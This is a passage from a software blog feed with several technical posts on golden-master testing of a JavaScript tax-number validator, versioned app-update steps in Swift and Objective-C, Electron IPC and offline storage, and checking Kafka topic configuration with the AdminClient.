  • Sometimes the scripts we get from our colleagues contain a little bit of extra logic which makes sense in the context where we use them. In this one, for example, I was told to “just don’t worry about the extra cases at the beginning. We are not interested in these and it’s okay to delete them.”

Side note: For the purposes of this exercise, I used ES6 transpiled with Babel. For my tests, I use mocha and chai.

Enough introduction! Let’s have a look at:

The Code

I admit I did a tiny bit of untested refactoring first: returning true or false instead of an alert, exporting the function, and deleting the lines that are, per our definition above, unnecessary.

export function validaContribuinte(contribuinte) {
// algoritmo de validação do NIF de acordo com
// http://pt.wikipedia.org/wiki/N%C3%BAmero_de_identifica%C3%A7%C3%A3o_fiscal
    let comparador;
    var temErro = 0;

    var check1 = contribuinte.substr(0, 1) * 9;
    var check2 = contribuinte.substr(1, 1) * 8;
    var check3 = contribuinte.substr(2, 1) * 7;
    var check4 = contribuinte.substr(3, 1) * 6;
    var check5 = contribuinte.substr(4, 1) * 5;
    var check6 = contribuinte.substr(5, 1) * 4;
    var check7 = contribuinte.substr(6, 1) * 3;
    var check8 = contribuinte.substr(7, 1) * 2;

    var total = check1 + check2 + check3 + check4 + check5 + check6 + check7 + check8;
    var divisao = total / 11;
    var modulo11 = total - parseInt(divisao) * 11;
    if (modulo11 == 1 || modulo11 == 0) {
        comparador = 0;
    } // excepção
    else {
        comparador = 11 - modulo11;
    }

    var ultimoDigito = contribuinte.substr(8, 1) * 1;
    if (ultimoDigito != comparador) {
        temErro = 1;
    }

    if (temErro == 1) {
        return false;
    }
    return true;
}

Where to start

The first thing you want to do when you refactor code is have unit tests for it. Since most code in need of refactoring is hard to understand, a lot of people prefer not to even try and instead create a Golden Master test. A detailed explanation as well as a walkthrough in Java can be found here.

Creating a Golden Master

So the steps to creating a Golden Master test are:

  1.  Create a number of random inputs for your testee
  2. Use these inputs to generate a number of outputs
  3. Record the inputs and outputs.

Why are we doing this?

If the number of random inputs is high enough, it’s very probable that we have all test cases in there somewhere. If we capture the state of the testee before we start changing anything, we can be sure we won’t break anything later.

There’s one thing I want to say now: A Golden Master record should in most cases be only a temporary solution. You do not really want files or databases full of randomly generated crap to clog your server, and you don’t want long-running tests with way too many redundant test cases on your CI server.

Step 1: Create A Number Of Random Inputs

For this, we have to actually look at the code to be refactored. A quick glance says: “This function takes strings of length 9 which contain only digits as valid input”.

My first instinct was to try and calculate all of them. After a few frustrating minutes which I spent discussing with my computer’s memory, I did a small back-of-an-envelope calculation (16 Bit x 9 x 899999999 > 15 TB). So this turned out to be a Bad Idea™.

The next best thing was to create some random numbers between 100000000 and 999999999. After a bit of experimentation, because I “have no idea of the algorithm” for the purpose of this exercise, I settled on 10000 random fake tax numbers, which corresponded to about three seconds of overall test runtime on my machine. The code to generate these is wrapped in a test case for easy access (remember, this is temporary):

describe('validatePortugueseTaxNumber', () => {
    describe('goldenMaster', () => {
        it('should generate a golden master', () => {
            const gen = random.create('My super Golden Master seed'),
                expectedResultsAndInputs = [ ...new Array(1000000) ].map(() => {
                    const input = gen.intBetween(100000000, 999999999),
                        ...
                });
        }).timeout(10000);
    });
});

Side note: It is often recommended to use a seedable random generator. Since at that point I was not sure whether I wanted to actually save the inputs or not, I ended up using this PRNG. It’s not strictly necessary for this exercise, though.

Step 2: Use These Inputs To Generate A Number Of Outputs.

Just call the function.

...
    const input = gen.intBetween(100000000, 999999999),
        result = validaContribuinte(input.toString(10));

        return { input, result };
...

Step 3: Record The Inputs And Outputs

This also was pretty straightforward. I used the built-in mechanisms of node.js to write the output to a ~3.5MB file.

fs.writeFileSync('goldenMaster.json', JSON.stringify(expectedResultsAndInputs));

And just like that, a Golden Master was created.

Create a test based on the Golden Master

The next step is to use the Golden Master in a test case. For each input, the corresponding output has to correlate to the file.
My test looks like this:

it('should always conform to golden master test', () => {
    const buffer = fs.readFileSync('goldenMaster.json'),
        data = JSON.parse(buffer);

    data.map(({ input, result }) => {
        return expect(validaContribuinte(input.toString(10))).to.equal(result);
    });
}).timeout(10000);

Side note: I stopped running the Golden Master generation every time; even though it would never produce different results unless the seed changed, it would’ve been a waste of resources to run every time.

I ran this a couple of times just for the heck of it. Then I started playing around with the code under test, deleting a line here, changing a number there, until I was confident that my Golden Master was sufficiently capturing all the cases. I encourage you to do this, it’s one of the very few times that you get to be happy about red tests.

golden master record

I was not really satisfied with the output yet: “expected false to equal true”, but in which case, exactly? Again, in this simple case it would probably not have been necessary, but sometimes it can be useful to also record the failing input. So, after some refactoring, this happened:

it('should always conform to golden master test', () => {
    const buffer = fs.readFileSync('goldenMaster.json'),
        data = JSON.parse(buffer);

    data.map(expectedResult => {
        const { input } = expectedResult;
        const result = validatePortugueseTaxNumber(input.toString(10));

        return expect({ input, result }).to.deep.equal(expectedResult);
    });
}).timeout(10000);

Refactoring

The refactoring itself was pretty straightforward. For the sake of brevity, most of the steps are skipped in this post.
Renaming the function and a few variables:

export function validatePortugueseTaxNumber(taxNumber) {
// algoritmo de validação do NIF de acordo com
// http://pt.wikipedia.org/wiki/N%C3%BAmero_de_identifica%C3%A7%C3%A3o_fiscal
    let comparator;
    let checkDigitWrong = 0;

    const check1 = taxNumber.substr(0, 1) * 9;
    const check2 = taxNumber.substr(1, 1) * 8;
    const check3 = taxNumber.substr(2, 1) * 7;
    const check4 = taxNumber.substr(3, 1) * 6;
    const check5 = taxNumber.substr(4, 1) * 5;
    const check6 = taxNumber.substr(5, 1) * 4;
    const check7 = taxNumber.substr(6, 1) * 3;
    const check8 = taxNumber.substr(7, 1) * 2;

    const total = check1 + check2 + check3 + check4 + check5 + check6 + check7 + check8;
    const divisao = total / 11;
    const modulo11 = total - parseInt(divisao) * 11;
    if (modulo11 == 1 || modulo11 == 0) {
        comparator = 0;
    }
    else {
        comparator = 11 - modulo11;
    }

    const ultimoDigito = taxNumber.substr(8, 1) * 1;
    if (ultimoDigito != comparator) {
        checkDigitWrong = 1;
    }

    if (checkDigitWrong == 1) {
        return false;
    }
    return true;
}

Simplifying (a lot):

export function validatePortugueseTaxNumber(taxNumber) {
    const checkSumMod11 = taxNumber.substr(0,8)
                                   .split('')
                                   .map(
                                       (digit, index) => {
                                       return parseInt(digit, 10) * (9 - index);
                                       })
                                   .reduce((a, b) => a + b) % 11,
          comparator = checkSumMod11 > 1? 11 - checkSumMod11 : 0;

    return parseInt(taxNumber.substr(8, 1), 10) === comparator;
}

This is where I stopped.

Writing unit tests

By now I had a better understanding of what my piece of code did. And, as was said above, it’s a good idea to get rid of a golden master, so the time had come to think about valid test inputs.

Apparently remainders of 0 and 1 were important. To these, I added the edge case of remainder 10, and some remainders in the middle range just to be sure. As for generating the corresponding inputs, I cheated a little:

...
if (checkSumMod11 === 0 && lastDigit === comparator) {
    console.log(taxNumber);
}
...

Using this generator function, I created the final unit tests for the portugueseTaxNumberValidator:

describe('validatePortugueseTaxNumber', () => {
    it('should return false for 520363144 (case checkSum % 11 === 0) ', () => {
        expect(validatePortugueseTaxNumber('520363144')).to.equal(false);
    });

    it('should return false for 480073977 (case checkSum % 11 === 1) ', () => {
        expect(validatePortugueseTaxNumber('480073977')).to.equal(false);
    });

    it('should return false for 291932333 (case checkSum % 11 === 2) ', () => {
        expect(validatePortugueseTaxNumber('291932333')).to.equal(false);
    });

    it('should return false for 872711478 (case checkSum % 11 === 10) ', () => {
        expect(validatePortugueseTaxNumber('872711478')).to.equal(false);
    });

    it('should return true for 523755600 (case checkSum % 11 === 0) ', () => {
        expect(validatePortugueseTaxNumber('523755600')).to.equal(true);
    });

    it('should return true for 998757039 (case checkSum % 11 === 2) ', () => {
        expect(validatePortugueseTaxNumber('998757039')).to.equal(true);
    });

    it('should return true for 504917951 (case checkSum % 11 === 10) ', () => {
        expect(validatePortugueseTaxNumber('504917951')).to.equal(true);
    });
});

Conclusion

Creating a Golden Master and using it during refactoring feels like you’re wrapped in a big, fluffy cotton ball. If the Golden Master record is detailed enough, nothing can go wrong. Or rather, if it does, you will notice in an instant. There are no qualms about deleting code, replacing it with something you think will do the same, because it’s a safe experiment. It was a fun exercise and I would do it again in an instant.

The post Refactoring Algorithmic Code using a Golden Master Record appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Handling app updates in iOS/macOS apps

codecentric Blog - Wed, 13-Dec-17 22:00


TL;DR: A solution is shown in which every app update step (one step per app version) is wrapped in its own class implementing a special AppUpdate protocol. On app launch, all classes implementing this protocol are loaded via reflection, instantiated, sorted by version number ascending and then each update step is executed if it hasn’t been already executed earlier.

One of the problems mobile engineers have to face is regular app updates. This problem is generally not new. However, we decided to present our solution because it may offer some interesting points.

Prior to the update, an app can have its state persisted in many ways and updating the app often requires transforming the existing data or creating new data. Two major problems exist in this scenario:

  1. we need to make sure update steps are executed even when a user skipped one or more app versions (e.g. the user was on a wild offline vacation and in the meantime two new app updates got released)
  2. we need to make sure update steps are executed only once (if update steps were executed every time the user starts the app, they would be redundant and would very likely break things)

The code demonstrating this approach is available on Bitbucket for both Swift and ObjC. Let’s quickly go through the major steps.

In the beginning

Usually, we want application updates to be executed as soon as the app starts. The usual callback for that is didFinishLaunchingWithOptions in AppDelegate. So, in there we would add a line which does the app updating:

Objective-C:

[AppUpdater performUpdateSteps];

Swift:

AppUpdater.performUpdateSteps()

Simple as that. Also, for debugging purposes, we add the following to AppDelegate to print the simulator app’s data folder to the console:

Objective-C:

#if TARGET_IPHONE_SIMULATOR
    NSLog(@"Documents Directory: %@", [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject]);
#endif

Swift:

#if (arch(i386) || arch(x86_64)) && os(iOS)
    let dirs: [String] = NSSearchPathForDirectoriesInDomains(FileManager.SearchPathDirectory.documentDirectory,
            FileManager.SearchPathDomainMask.allDomainsMask, true)
    print(dirs[dirs.endIndex - 1])
#endif

That way, we can easily track the Library/Preferences folder where the Preferences plist file is kept and delete it for easier manual testing of update steps.

AppUpdater

Now let’s look into what’s going on in AppUpdater since it does the majority of work.

Guided by the SRP, we have a class for every version update. Therefore, executing app updates comes down to iterating through the update class instances and executing each one’s update step. An example is given in the code below:

Objective-C:

ASTEach(updaters, ^(id<AppUpdate> updater) {
    if ([updater canExecuteUpdate])
    {
        [self performUpdateStepWithUpdater:updater];
    }
});

Swift:

for updater in updaters {
    if updater.canExecuteUpdate() {
        performUpdateStepWithUpdater(updater)
    }
}

In case you’re wondering where the ASTEach in the ObjC example comes from, it’s from Asterism, a functional toolbelt for Objective-C.
Pretty simple. Below is the class diagram showing the relations between AppUpdater and the AppUpdate protocol, which is implemented by the specific updaters (v1.0.0, v1.1.0, etc.).

class diagram app updates

Each update step has its own unique identifier (more on that later). To make sure app updates execute only once, update step identifiers can be stored in UserDefaults. Before executing an update, the app would check if the update identifier already exists in UserDefaults, and only execute the update step if it doesn’t exist. All this gives us the code for an AppUpdater class:

Objective-C:

@implementation AppUpdater

+ (void) performUpdateSteps
{
    NSArray* updaters = @[
        [AppUpdate_001_000_000 new],
        [AppUpdate_001_001_000 new]
    ];

    updaters = ASTSort(updaters, ^NSComparisonResult(id<AppUpdate> obj1, id<AppUpdate> obj2) {
        return [obj1.version compare:obj2.version];
    });

    ASTEach(updaters, ^(id<AppUpdate> updater) {
        if ([updater canExecuteUpdate])
        {
            [self performUpdateStepWithUpdater:updater];
        }
    });
}

+ (void) performUpdateStepWithUpdater:(id<AppUpdate> const)updater
{
    if (![NSUserDefaults.standardUserDefaults objectForKey:updater.version])
    {
        NSLog(@"▸ Performing update step: %@", updater.stepName);
        updater.updateBlock();
        [NSUserDefaults.standardUserDefaults setValue:updater.stepDescription forKey:updater.version];
        NSLog(@"▸ Finished update step: %@", updater.stepName);
        [NSUserDefaults.standardUserDefaults synchronize];
    }
}

@end

Swift:

class AppUpdater {

    class func performUpdateSteps() {
        let updaters = [
            AppUpdate_001_000_000(),
            AppUpdate_001_001_000()
        ]

        for updater in updaters {
            if updater.canExecuteUpdate() {
                performUpdateStepWithUpdater(updater)
            }
        }
        UserDefaults.standard.synchronize()
    }

    class func performUpdateStepWithUpdater(_ updater: AppUpdate) {
        if (UserDefaults.standard.object(forKey: updater.stepName()) == nil) {
            print("▸ Performing update step \(updater.stepName())")
            updater.updateBlock()()
            UserDefaults.standard.setValue(updater.stepDescription(), forKey: updater.stepName())
            print("▸ Finished update step: \(updater.stepName())")
        }
    }
}

The method performUpdateStepWithUpdater executes an app update step if it determines (by looking up UserDefaults) that it hasn’t already been executed. App update instances are listed in the updaters array, sorted in the order in which they should be executed. Update classes are conveniently named like AppUpdate_001_001_000, where the ‘001_001_000’ suffix describes the app version, e.g. 1.1.0, supporting versions up to 999.999.999. This makes it useful for sorting app update classes in the IDE project explorer tree, but it also paves the way for another approach: instead of listing all updater classes in the array like we did:

Objective-C:

NSArray* updaters = @[
    [AppUpdate_001_000_000 new],
    [AppUpdate_001_001_000 new]
];

Swift:

let updaters = [
    AppUpdate_001_000_000(),
    AppUpdate_001_001_000()
]

we can retrieve all classes implementing the AppUpdate protocol by reflection, so our performUpdateSteps method comes down to:

Objective-C:

+ (void) performUpdateSteps
{
    NSArray* updateClasses = [Reflection classesImplementingProtocol:@protocol(AppUpdate)];
    NSArray* updaters = ASTMap(updateClasses, (id (^)(id)) ^id(Class updateClass) {
        return [updateClass new];
    });

    updaters = ASTSort(updaters, ^NSComparisonResult(id<AppUpdate> obj1, id<AppUpdate> obj2) {
        return [obj1.version compare:obj2.version];
    });

    ASTEach(updaters, ^(id<AppUpdate> updater) {
        if ([updater canExecuteUpdate])
        {
            [self performUpdateStepWithUpdater:updater];
        }
    });
}

Swift:

class func performUpdateSteps() {
    let updateClasses = getClassesImplementingProtocol(p: AppUpdate.self)
    let updaters = updateClasses.map({ (updaterClass) -> AppUpdate in
        return updaterClass.alloc() as! AppUpdate
    }).sorted {
        $0.version() < $1.version()
    }

    for updater in updaters {
        if updater.canExecuteUpdate() {
            performUpdateStepWithUpdater(updater)
        }
    }
    UserDefaults.standard.synchronize()
}

Once the classes are extracted and instantiated, they are sorted by app version to ensure the proper order of update step execution. Extracting all classes implementing a given protocol happens in the getClassesImplementingProtocol method in Reflection.swift or Reflection.h. The content of those files can be looked up on Bitbucket.
As a result, all a developer has to do in order to add a new app update is to create a class implementing the AppUpdate protocol.

AppUpdate step

Every app update step has its own class implementing the AppUpdate protocol. An example implementation is given below:

Objective-C:

@implementation AppUpdate_001_001_000

- (NSString* const) version
{
    return @"001-001-000";
}

- (BOOL const) canExecuteUpdate
{
    return SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(9);
}

- (NSString* const) stepName
{
    return @"SpotlightIndexing";
}

- (NSString* const) stepDescription
{
    return @"Index documents and photos in spotlight.";
}

- (void (^)(void)) updateBlock
{
    return ^{
        // iterate through all documents and photos and index them in spotlight
    };
}

@end

Swift:

class AppUpdate_001_001_000: NSObject, AppUpdate {
    func version() -> String {
        return "001-001-000"
    }

    func canExecuteUpdate() -> Bool {
        if #available(iOS 9.0, *) {
            return true
        } else {
            return false
        }
    }

    func stepName() -> String {
        return "upd-\(version())"
    }

    func stepDescription() -> String {
        return "Index documents and photos in spotlight."
    }

    func updateBlock() -> (() -> Void) {
        return {
            // EXAMPLE: iterate through all documents and photos and index them in spotlight
        }
    }
}

The version method returns a string in the format ###-###-###, which is used to sort updaters chronologically. canExecuteUpdate is the place where an update step can decide whether it should be executed at all (e.g. it may only make sense on certain iOS versions because it relies on an API introduced in that version).
stepName returns a String which needs to be unique across all update step instances, because it is used as the key in UserDefaults under which we track which steps have been executed so far.
stepDescription is a short description of what the update step does (usually one sentence). It is stored as the value in UserDefaults.
updateBlock returns the block which does the actual job of whatever the update step should do. Some examples include:

  • resetting cached images to force the app to retrieve new shiny images from the server
  • indexing content in Spotlight
  • database schema update / data migration in case you don't use CoreData (which you probably should), but something like FMDB instead
  • complete removal of the local DB and other data, forcing the app to retrieve everything from the server again

Benefits

  • Wrapping each update step in its own class keeps the code clean and makes unit testing easier.
  • Adding a new update step boils down to creating one class which implements the AppUpdate protocol.

Alternatives

As an alternative to the class-based approach described in this article, a block-based approach can be used. Such an approach is taken by the MTMigration utility.

Useful links

https://en.wikipedia.org/wiki/Single_responsibility_principle
https://en.wikipedia.org/wiki/Reflection_(computer_programming)
https://github.com/mysterioustrousers/MTMigration

The post Handling app updates in iOS/macOS apps appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Developing modern offline apps with ReactJS, Redux and Electron – Part 4 – Electron

codecentric Blog - Sun, 10-Dec-17 23:00

The previous part of this series showed the beautiful interplay of React and Redux. In this part, we are going to take a rough look at a technology called Electron. An essential technology in our recent projects, Electron is vastly different from the topics of the previous two parts of this blog series. React and Redux are solely used to implement the application logic. Electron, on the other hand, is used to implement both structure and application logic to create real cross-platform desktop apps. It is a wrapper which contains a Chromium browser in a NodeJS environment. This technology enables the combination of pure web frontend technologies and additionally gives your application full access to the underlying operating system via NodeJS. In the following, we will introduce the basic concepts using a simple Electron app and show how this technology solves the everlasting single-threaded obstacle of non-responsive JavaScript applications.

  1. Introduction
  2. ReactJS
  3. ReactJS + Redux
  4. Electron framework
  5. ES5 vs. ES6 vs. TypeScript
  6. WebPack
  7. Build, test and release process

The Core Parts

An Electron app consists of a few main parts. The basic concept is that you have two or more concurrently running processes. First, there is the main process of your application. In this process you have access to NodeJS and thus all of your operating system’s power, as well as a large, distinct subset of the Electron API. Furthermore, the main process creates browser windows. These have one or more render processes and share an important property with your normal browser: they are contained in a sandbox, because these processes are responsible for rendering the DOM of our web app. Render processes have access to the NodeJS API and a distinct subset of the Electron API, but not to the operating system.

A few functionalities of Electron can even be used in both the main and a render processes. By default JavaScript processes in NodeJS and Chromium are single-threaded and therefore still limited, even if both processes are operating system level processes.

Electron core parts

OS Integration

Since Electron is a JavaScript technology, the final app can be deployed to common desktop operating systems like Windows, macOS and Linux, in 32- and 64-bit versions. To do so, you can use the electron-packager, which is developed by the community. The packager creates installers for various operating systems, which makes it easy to deploy Electron apps in enterprise environments. Furthermore, Electron provides essential OS integration on its own: menu bars, OS-level notifications, file dialogs and many other features for nearly all operating systems.

In our projects we used the file dialog to import files from the file system. The allowed properties depend on the operating system. Please check out the API for more details [DIALOG].

const {dialog} = require('electron');
const properties = ['openFile', 'openDirectory'];
dialog.showOpenDialog({ properties });

We also created custom Electron menu bars for production and development mode. During development we could toggle the developer tools from chromium. For production you can remove that feature from the final Electron app.

 const createMenu = () => {
 const { app, Menu } = electron;
 const template = [
   {
     label: 'Edit',
     submenu: [ 
      { role: 'cut' }, 
      { role: 'copy' }, 
      { role: 'paste' },
      { role: 'selectall' }
    ]
   },
   {
     label: 'View',
     submenu: [ 
      { role: 'reload' },
      { role: 'forcereload' },  
      { role: 'toggledevtools' }
     ]
   }
 ];
 const menu = Menu.buildFromTemplate(template);
 Menu.setApplicationMenu(menu);
};

Electron native menu

To see a full list of all native Electron features, go to [ELECTRON].

IPC Communication

In the previous section we talked about the awesome OS integration of Electron. But how can we harness the full potential of our operating system and backend languages like NodeJS to unleash the power of JavaScript? We can do this with the built-in inter-process-communication in Electron. The modules that handle that communication, the ipcMain and ipcRenderer, are part of Electron’s core. ipcMain enables communication from the main process to the render processes. The ipcRenderer handles the opposite direction from render to main.

“The ipcRenderer module is an instance of the EventEmitter class. It provides a few methods so you can send synchronous and asynchronous messages from the render process (web page) to the main process. You can also receive replies from the main process.” [IPCRENDERER]

In the following example, we register an Event Listener with the ipcMain module using the channel name LOAD_FILE_WITH_PATH. Once the Event Listener finishes, we send an event back to the React app. Depending on the result, we append “success” or “error” to the channel name. This allows us to handle the response differently inside React [IPCMAIN].

In the React app, we use ipcRenderer.send to send messages asynchronously to the Event Listener, using the identical channel name. To send messages synchronously, use ipcRenderer.sendSync. After that we add a one-time listener function for the event using ipc.once. To distinguish IPC calls, we add a unique uuid to the channel name [IPCRENDERER].

electron.js
const ipc = require('electron').ipcMain;
ipc.on(ipcConstants.LOAD_FILE_WITH_PATH, async (event, request) => {
  try {
    const fileContent = await fileService.readFileAsync(request.path);
    event.sender.send(
      `${ipcConstants.LOAD_FILE_WITH_PATH}-success-${request.uuid}`, fileContent);
  } catch (error) {
    event.sender.send(
      `${ipcConstants.LOAD_FILE_WITH_PATH}-error-${request.uuid}`, error.message);
  }
});
fileService.js
const ipc = require('electron').ipcRenderer;
export function readFileContentFromFileSystem(path) {
  const uuid = uuidV4();
  ipc.send(LOAD_FILE_WITH_PATH, { uuid, path });
  return new Promise((resolve, reject) => {
    ipc.once(`${LOAD_FILE_WITH_PATH}-success-${uuid}`,
      (event, xml) => {
        resolve(xml);
      });
    ipc.once(`${LOAD_FILE_WITH_PATH}-error-${uuid}`,
      (event, args) => {
        reject(args);
      });
  });
}

To debug the IPC communication between your React application and Electron, you need to install the Electron DevTools Extension.

npm install --save-dev devtron

Afterwards run the following command from the console tab of your application. This will add another tab with the Devtron tools.

require('devtron').install()

Under the Devtron tab you get all kinds of details about your Electron application. Devtron displays all default event listeners from Electron as well as your own custom listeners. Under the IPC link you can record all IPC calls from your application. The Lint tab allows you to do Lint checks and the Accessibility tab checks your web application against the Accessible Rich Internet Applications Suite (ARIA) standard.

Devtron event listener

Here is an example what the IPC communication in our project looks like.

Devtron IPC call

Remember that we claimed that Electron is the end of the everlasting single-threaded obstacle? Using IPC we can move CPU-intensive work to Electron and outsource these tasks using electron-remote. With a single line we can create a task pool that will create a new browser window in the background and execute our code (electronFileService.js) in a separate OS process / browser window. Here is an example of how to set up the task pool for the file service:

const { requireTaskPool } = require('electron-remote');
const fileService = requireTaskPool(require.resolve('./electronFileService'));

Offline and Storage

When developing an offline desktop application with Electron you have several options on where to store and read data from.

Option 1: Electron / NodeJS

In Electron you can execute NodeJS commands. Therefore you can use almost any module from npmjs.org to read and store data on your local operating system. We recommend this option when you need to persist and process a lot of data.

  • SQLite3 (relational database)[SQLITE]
  • MongoDB (document database)[MONGODB]
  • Neo4J (graph database)[NEO4J]

Electron app

Option 2: React & Redux / Web Browser

In the second option we persist and process data inside the browser. Modern browsers offer a range of APIs that allow for persisting browser data, e.g. LocalStorage, IndexedDB, SessionStorage, WebSQL and Cookies. We recommend this approach for small datasets that need to be persisted locally. This can be done with any web technology. In our case, the React web application uses Redux as a store for the application state. You can use the redux-persist module to automatically persist the Redux store to IndexedDB or LocalStorage. In case your web app crashes or you restart the browser, you can configure redux-persist [REDUXP] to automatically rehydrate the Redux store.

React WebApp

Modern browsers support the service worker API to spawn threads for processing data. If there is information that you need to persist and reuse across restarts, service workers have access to the various browser storage technologies.

Option 3: Combination of Option 1 and 2

There might be times when your desktop client will be online and can retrieve data from a backend server. With our proposed stack you have the full freedom of choosing how to access the backend services. You can either call the backend services via the web application layer (i.e. the React WebApp) or you can use the Electron/NodeJS layer. Which way you choose is up to you and might depend on security restrictions, the existence of NodeJS modules you can reuse, or other aspects.

Electron React App

Summary

Electron is an extremely powerful technology that enables you and your team to create beautiful, responsive, OS-independent and maintainable desktop applications. Because there is so much more to Electron, we highly recommend reading https://electronjs.org/docs for the parts that you are interested in or need in your projects. Stay tuned for our next article.

References

The post Developing modern offline apps with ReactJS, Redux and Electron – Part 4 – Electron appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Validating Topic Configurations in Apache Kafka

codecentric Blog - Thu, 07-Dec-17 00:08

Messages in Apache Kafka are appended to (partitions of) a topic. Topics have a partition count, a replication factor and various other configuration values. Why do those matter and what could possibly go wrong?

Why does Kafka topic configuration matter?

There are three main parts that define the configuration of a Kafka topic:

  • Partition count
  • Replication factor
  • Technical configuration

The partition count defines the level of parallelism of the topic. For example, a partition count of 50 means that up to 50 consumer instances in a consumer group can process messages in parallel. The replication factor specifies how many copies of a partition are held in the cluster to enable failover in case of broker failure. And in the technical configuration, one can define the cleanup policy (deletion or log compaction), flushing of data to disk, maximum message size, permitting unclean leader elections and so on. For a complete list, see https://kafka.apache.org/documentation/#topicconfigs. Some of these properties are quite easy to change at runtime. For others this is a lot harder, though.

Let's take the partition count. Increasing it is easy – just run

bin/kafka-topics.sh --alter --zookeeper zk:2181 --topic mytopic --partitions 42

This might be sufficient for you. Or it might open the fiery gates of hell and break your application. The latter is the case if you depend on all messages for a given key landing on the same partition (to be handled by the same consumer in a group) or for example if you run a Kafka Streams application. If that application uses joins, the involved topics need to be copartitioned, meaning that they need to have the same partition count (and producers using the same partitioner, but that is hard to enforce). Even without joins, you don't want messages with the same key to end up in different KTables.

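To make the copartitioning requirement concrete, here is a minimal Kafka Streams sketch (the topic names are made up and a recent Streams API is assumed): the join only works if both input topics have the same partition count.

import org.apache.kafka.streams.StreamsBuilder;
import org.apache.kafka.streams.kstream.KStream;
import org.apache.kafka.streams.kstream.KTable;

StreamsBuilder builder = new StreamsBuilder();
KStream<String, String> orders = builder.stream("orders");     // e.g. 42 partitions
KTable<String, String> customers = builder.table("customers"); // must also have 42 partitions
// Kafka Streams checks copartitioning at startup and fails if the partition counts differ.
orders.join(customers, (order, customer) -> order + " / " + customer)
      .to("orders-enriched");
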
Changing the replication factor is serious business. It is not a case of simply saying “please increase the replication factor to x” as it is with the partition count. You need to completely reassign partitions to brokers, specifying the preferred leader and n replicas for each partition. It is your task to distribute those well across your cluster. This is no fun for anyone involved. Practical experience with this has actually led to this blog post.
The technical configuration has an impact as well. It could be for example quite essential that a topic is using compaction instead of deletion if an application depends on that. You also might find the retention time too small or too big.

The Evils of Automatic Topic Creation

In a recent project, a central team managed the Kafka cluster. This team kept a lot of default values in the broker configuration. This is mostly sensible as Kafka comes with pretty good defaults. However, one thing they kept was auto.create.topics.enable=true. This property means that whenever a client tries to write to or read from a non-existing topic, Kafka will automatically create it. Defaults for partition count and replication factor were kept at 1.

This led to the situation where the team forgot to set up a new topic manually before running producers and consumers. Kafka created that topic with default configuration. Once this was noticed, all applications were stopped and the topic deleted – only to be created again automatically seconds later, presumably because the team didn’t find all clients. “Ok”, they thought, “let’s fix it manually”. They increased the partition count to 32, only to realize that they had to provide the complete partition assignment map to fix the replication factor. Even with tool support from Kafka Manager, this didn’t give the team members a great feeling. Luckily, this was only a development cluster, so nothing really bad happened. But it was easy to conceive that this could also happen in production as there are no safeguards.

Another danger of automatic topic creation is the sensitivity to typos. Let's face it – sometimes we all suffer from butterfingers. Even if you took all necessary care to correctly create a topic called “parameters”, you might end up with something like this:

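(The producer call below is only a hypothetical illustration; the producer, key and value variables are assumed to be defined elsewhere.)

// Typo: "paramaters" instead of "parameters". With automatic topic creation
// enabled, Kafka silently creates the misspelled topic.
producer.send(new ProducerRecord<>("paramaters", key, value));
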
Automatic topic creation means that your producer thinks everything is fine, and you’ll scratch your head as to why your consumers don’t receive any data.

Another conceivable issue is that a developer who is maybe not yet that familiar with the Producer API might confuse the String parameters of the send method:

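(Again a hypothetical sketch: the topic "parameters", the payload variable and the producer are assumptions, not code from the original post.)

// Intended: new ProducerRecord<>("parameters", UUID.randomUUID().toString(), payload)
// Actual:   the random UUID is passed as the first String parameter, i.e. as the topic name.
producer.send(new ProducerRecord<>(UUID.randomUUID().toString(), "parameters", payload));
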
So while our developer meant to assign a random value to the message key, he accidentally set a random topic name. Every time a message is produced, Kafka creates a new topic.

So why don’t we just switch automatic topic creation off? Well, if you can: do it. Do it now! Sadly, the team didn’t have that option. But an idea was born – what would be the easiest way to at least fail fast at application startup when something is different than expected?

How to automatically check your topic configuration

In older versions of Kafka, we basically used the code called by the kafka-topics.sh script to programmatically work with topics. To create a topic, for example, we looked at how to use kafka.admin.CreateTopicCommand. This was definitely better than writing straight to Zookeeper because there is no need to replicate the logic of “which ZNode goes where”, but it always felt like a hack. And of course we got a dependency on the Kafka broker in our code – definitely not great.

Kafka 0.11 implemented KIP-117, thus providing a new type of Kafka client – org.apache.kafka.clients.admin.AdminClient. This client enables users to programmatically execute admin tasks without relying on those old internal classes or even Zookeeper – all Zookeeper tasks are executed by brokers.

With AdminClient, it’s fairly easy to query the cluster for the current configuration of a topic. For example, this is the code to find out if a topic exists and what its partition count and replication factor is:

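The following is a sketch of how such a check can look with the AdminClient; the broker address localhost:9092, the topic name test_topic and the wrapper class are placeholders, not values from the original post.

import java.util.Collections;
import java.util.Properties;
import java.util.concurrent.ExecutionException;
import org.apache.kafka.clients.admin.AdminClient;
import org.apache.kafka.clients.admin.AdminClientConfig;
import org.apache.kafka.clients.admin.TopicDescription;

public class TopicConfigCheck {
    public static void main(String[] args) throws InterruptedException {
        Properties props = new Properties();
        props.put(AdminClientConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");
        try (AdminClient adminClient = AdminClient.create(props)) {
            try {
                // describeTopics returns a DescribeTopicsResult whose values are KafkaFutures.
                TopicDescription description =
                        adminClient.describeTopics(Collections.singleton("test_topic"))
                                   .values().get("test_topic").get();
                int partitionCount = description.partitions().size();
                int replicationFactor = description.partitions().get(0).replicas().size();
                System.out.printf("Topic exists with %d partitions and replication factor %d%n",
                        partitionCount, replicationFactor);
            } catch (ExecutionException e) {
                // An UnknownTopicOrPartitionException as cause means the topic does not exist.
                System.out.println("Topic does not exist: " + e.getCause());
            }
        }
    }
}
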
The DescribeTopicsResult contains all the info required to find out if the topic exists and how partition count and replication factor are set. It’s asynchronous, so be prepared to work with Futures to get your info.

Getting configs like cleanup.policy works similarly, but uses a different method:

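Again only a sketch: it reuses the adminClient and the placeholder topic name from the previous example, and assumes a reasonably recent Kafka client version for the ConfigResource import path.

import java.util.Collections;
import org.apache.kafka.clients.admin.Config;
import org.apache.kafka.common.config.ConfigResource;

ConfigResource topic = new ConfigResource(ConfigResource.Type.TOPIC, "test_topic");
Config config = adminClient.describeConfigs(Collections.singleton(topic))
                           .values().get(topic)
                           .get(); // again a KafkaFuture
String cleanupPolicy = config.get("cleanup.policy").value();
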
Under the hood there is the same Future-based mechanism.

A first implementation attempt

